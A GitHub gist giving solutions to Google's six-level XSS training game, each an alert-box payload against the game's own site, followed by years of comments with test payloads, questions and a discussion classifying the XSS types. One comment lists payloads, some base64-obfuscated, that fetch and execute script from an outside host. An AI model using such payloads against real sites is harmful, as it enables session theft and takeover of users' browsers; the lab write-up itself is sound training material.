Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Solutions of the Google XSS Challenge..
Hey All,
I am P.B.Surya.Subhash, a 17 Year coder,hacker and a student.
Recently I happen to see so many posts regarding this " Google XSS Challenge " and i was fortunate enough to complete them..
These are the solutions for the challenges ;)
##############################################################################
Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
Well that wasn't so tough .. Was it ?
##############################################################################
Level 2: Persistence is key
https://xss-game.appspot.com/level2/frame
post-content=<img src='foobar' onerror='alert("xss")'>
#############################################################################
Level 3: That sinking feeling...
https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
#############################################################################
Level 4: Context matters
https://xss-game.appspot.com/level4/frame
timer=');alert('xss
#############################################################################
Level 5: Breaking protocol
https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript%3Aalert%28%27xss%27%29
#############################################################################
Level 6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
#############################################################################
Hope this will help you all to learn something..
Have a nice day,
Thanks to google for giving me a chance to test my skills \m/
Thanks to google again for the nice cake in the end , I like cakes so much ;)
Bye all..
@Simon90Italy

This comment has been minimized.

Copy link

Simon90Italy commented Sep 1, 2014

"> ">"

@Simon90Italy

This comment has been minimized.

Copy link

Simon90Italy commented Sep 1, 2014

"> ">"

@ahmedsherif

This comment has been minimized.

Copy link

ahmedsherif commented Sep 9, 2014

">

@ahmedsherif

This comment has been minimized.

Copy link

ahmedsherif commented Sep 9, 2014

">

@ahmedsherif

This comment has been minimized.

Copy link

ahmedsherif commented Sep 9, 2014

</textarea><>>

@ahmedsherif

This comment has been minimized.

Copy link

ahmedsherif commented Sep 9, 2014

</textarea>">

@jjab92

This comment has been minimized.

Copy link

jjab92 commented Nov 18, 2015

"><img src=x onerror=;;alert('XSS')/>

@jjab92

This comment has been minimized.

Copy link

jjab92 commented Nov 18, 2015

"><img src=x onclick=;;alert('XSS')/>

@jjab92

This comment has been minimized.

Copy link

jjab92 commented Nov 18, 2015

'"()&%1 XSS") ;</script> <img src="<img src=search"/onerror=alert("Xss")//"> ">

@ianborla

This comment has been minimized.

Copy link

ianborla commented Nov 18, 2015

This works i think

using H1 hahaha

but not the <script>alert(0)</script> script

@b2874196

This comment has been minimized.

Copy link

b2874196 commented Mar 28, 2016

+<a+id="a"href=javascript%26colon;alert%26lpar;1%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Click me plz

@Felix1Catus

This comment has been minimized.

Copy link

Felix1Catus commented Apr 24, 2016

">

HI

@Felix1Catus

This comment has been minimized.

Copy link

Felix1Catus commented Apr 24, 2016

<iframe src="http://www.google.com"></iframe>
@Felix1Catus

This comment has been minimized.

Copy link

Felix1Catus commented Apr 24, 2016

@Felix1Catus

This comment has been minimized.

Copy link

Felix1Catus commented Apr 24, 2016

@sunnybhasin

This comment has been minimized.

Copy link

sunnybhasin commented Jul 11, 2016

good

@sunnybhasin

This comment has been minimized.

Copy link

sunnybhasin commented Jul 11, 2016

@D0n9

This comment has been minimized.

Copy link

D0n9 commented Oct 31, 2016

nice

@joe-rinaldi

This comment has been minimized.

Copy link

joe-rinaldi commented Nov 23, 2016

solution for level 3 doesn't work ?

@akanshgulati

This comment has been minimized.

@bangladeshpentest

This comment has been minimized.

Copy link

bangladeshpentest commented Nov 27, 2016

"><img src=x onerror=prompt('XSS')>

@bangladeshpentest

This comment has been minimized.

Copy link

bangladeshpentest commented Nov 27, 2016

"><img src=x onerror=prompt('XSS')>

@bangladeshpentest

This comment has been minimized.

Copy link

bangladeshpentest commented Nov 27, 2016

%00<img src=x onerror=prompt('XSS')>

@bkrall

This comment has been minimized.

Copy link

bkrall commented Dec 8, 2016

@c-urly

This comment has been minimized.

Copy link

c-urly commented Feb 9, 2017

solution for level 3 is not working for me

@honcbb

This comment has been minimized.

Copy link

honcbb commented Feb 15, 2017

"><img src=x onerror:alert(1)/>

@honcbb

This comment has been minimized.

Copy link

honcbb commented Feb 15, 2017

@ducptit

This comment has been minimized.

Copy link

ducptit commented Feb 23, 2017

@ducptit

This comment has been minimized.

Copy link

ducptit commented Feb 23, 2017

@AG-Systems

This comment has been minimized.

Copy link

AG-Systems commented Mar 15, 2017

Thank you

@Skiba246

This comment has been minimized.

Copy link

Skiba246 commented Apr 24, 2017

@Skiba246

This comment has been minimized.

Copy link

Skiba246 commented Apr 24, 2017

@ghost

This comment has been minimized.

Copy link

ghost commented May 7, 2017

styling with markdown is supported, why y'all flexin?

@babajaggu

This comment has been minimized.

Copy link

babajaggu commented Jun 11, 2017

Just a Test

@babajaggu

This comment has been minimized.

Copy link

babajaggu commented Jun 11, 2017

No description provided.

@pradeepmehta

This comment has been minimized.

Copy link

pradeepmehta commented Jul 26, 2017

hy

@iosnotlari

This comment has been minimized.

Copy link

iosnotlari commented Sep 7, 2017

SMART ASS TORVALDS

@Blablub91

This comment has been minimized.

Copy link

Blablub91 commented Oct 4, 2017

Which type of XSS Attack is used in the different levels?
In my opinion It might be
Level 1 reflected XSS
Level 2 persistent XSS
Level 3 reflected or dom-based XSS (Iam not sure)
Level 4 reflected XSS
Level 5 dom-based XSS
Level 6 dom-based XSS (Iam not sure)?

Thanks!

@SLAVONchick

This comment has been minimized.

Copy link

SLAVONchick commented Oct 11, 2017

@lavaz12

This comment has been minimized.

Copy link

lavaz12 commented Jan 12, 2018

@lavaz12

This comment has been minimized.

Copy link

lavaz12 commented Jan 12, 2018

<iframe width="560" height="315" src="https://www.youtube.com/embed/GowtoPSh6oM" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
@lavaz12

This comment has been minimized.

Copy link

lavaz12 commented Jan 12, 2018

@lavaz12

This comment has been minimized.

Copy link

lavaz12 commented Jan 12, 2018

@alpha6969

This comment has been minimized.

Copy link

alpha6969 commented Mar 23, 2018

guy, are you play google SQL injection game ???
how to do this :'(
https://learn-web-tech.appspot.com/class/nullcon/section/1

@kmustriver

This comment has been minimized.

Copy link

kmustriver commented Apr 11, 2018

@kmustriver

This comment has been minimized.

Copy link

kmustriver commented Apr 11, 2018

<script>alert('12345678')<script>
@SuperN1nja

This comment has been minimized.

Copy link

SuperN1nja commented May 15, 2018

<script src="https://xs.ht/jquery.min.js"></script> <script src="https://xs.ht/x.js"></script> <script src="https://xs.ht"></script>

"><script src=https://xs.ht></script>

<script src=https://bit.xss.ht></script>

(80 chars)
<img src=x onerror=$.getScript("//xs.ht/x.js")>

@SuperN1nja

This comment has been minimized.

Copy link

SuperN1nja commented May 15, 2018

"><script src=https://bit.xss.ht></script>

javascript:eval('var a=document.createElement('script');a.src='https://xs.ht';document.body.appendChild(a)')

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYQ=== autofocus>

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYQ=== onerror=eval(atob(this.id))>

"><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYQ===>

"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://bit.xss.ht";parent.document.body.appendChild(a);</script>">

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//bit.xss.ht");a.send();</script> <script>$.getScript("//xs.ht")</script>">>">">#"#><<script src="https://xs.ht/jquery.min.js"></script> <script src="https://xs.ht/x.js"></script> <script src="https://xs.ht"></script>

"><script src=https://xs.ht></script>

<script src=https://bit.xss.ht></script>

(80 chars)
<img src=x onerror=$.getScript("//xs.ht/x.js")>

@kres0345

This comment has been minimized.

Copy link

kres0345 commented May 23, 2018

The following disappears: :END: Damn, this kinda works. Pastebin of the code: https://pastebin.com/3fg3ZEBa

@Konnexxary

This comment has been minimized.

Copy link

Konnexxary commented Jun 7, 2018

Hello this is a text that is being tested.

@Konnexxary

This comment has been minimized.

Copy link

Konnexxary commented Jun 7, 2018

@Konnexxary

This comment has been minimized.

Copy link

Konnexxary commented Jun 8, 2018

hi

@Konnexxary

This comment has been minimized.

Copy link

Konnexxary commented Jun 8, 2018

@wahengchang

This comment has been minimized.

Copy link

wahengchang commented Jun 21, 2018

solution v3 is not work

@OfficialORHTeam

This comment has been minimized.

Copy link

OfficialORHTeam commented Jun 28, 2018

post-content=

@awkonecki

This comment has been minimized.

Copy link

awkonecki commented Jul 4, 2018

anyone try problem 4 lately, can't seem to get it to work.

@ahmedselim2017

This comment has been minimized.

Copy link

ahmedselim2017 commented Nov 13, 2018

@RAVIPRAJ

This comment has been minimized.

Copy link

RAVIPRAJ commented Dec 4, 2018

why data:text/plain in level 6

@MathiasTech

This comment has been minimized.

Copy link

MathiasTech commented Apr 14, 2019

@Babloome

This comment has been minimized.

Copy link

Babloome commented May 6, 2019

Hello Franndsss..

@Babloome

This comment has been minimized.

Copy link

Babloome commented May 6, 2019

@Babloome

This comment has been minimized.

Copy link

Babloome commented May 6, 2019

Test

@acer4666

This comment has been minimized.

Copy link

acer4666 commented Jun 3, 2019

In response to @Blablub91:

Which type of XSS Attack is used in the different levels?
In my opinion It might be
Level 1 reflected XSS
Level 2 persistent XSS
Level 3 reflected or dom-based XSS (Iam not sure)
Level 4 reflected XSS
Level 5 dom-based XSS
Level 6 dom-based XSS (Iam not sure)?

Thanks!

I find a more helpful classification to be the four-box model (https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting#Client_XSS), in which they would be classified as:

level 1. reflected server xss
level 2. stored client xss (dom-based)
level 3. reflected client xss (dom-based)
level 4. reflected server xss
level 5. reflected server xss
level 6. reflected client xss (dom-based)

Level 2 is possibly attempting to emulate a stored server xss, but the posts are stored in the browser's localStorage which is part of the DOM. For level 5, the input is rendered in a template on the server and sent back as part of the response.

@Ocelot124286

This comment has been minimized.

Copy link

Ocelot124286 commented Jun 27, 2019

@jayateertha043

This comment has been minimized.

Copy link

jayateertha043 commented Aug 7, 2019

@FIFIHFIJEHGUHIEUHG

This comment has been minimized.

Copy link

FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

<script>alert(0)</script> script
@FIFIHFIJEHGUHIEUHG

This comment has been minimized.

Copy link

FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

hello

@FIFIHFIJEHGUHIEUHG

This comment has been minimized.

Copy link

FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

<script alert("hi") </script>
@FIFIHFIJEHGUHIEUHG

This comment has been minimized.

Copy link

FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

<script> alert("hi") </script>
@Arifulislam43

This comment has been minimized.

Copy link

Arifulislam43 commented Nov 14, 2019

NICE

@Aaronstone0056

This comment has been minimized.

Copy link

Aaronstone0056 commented Nov 16, 2019

<script>alert('xss')</script>
@Aaronstone0056

This comment has been minimized.

Copy link

Aaronstone0056 commented Nov 16, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.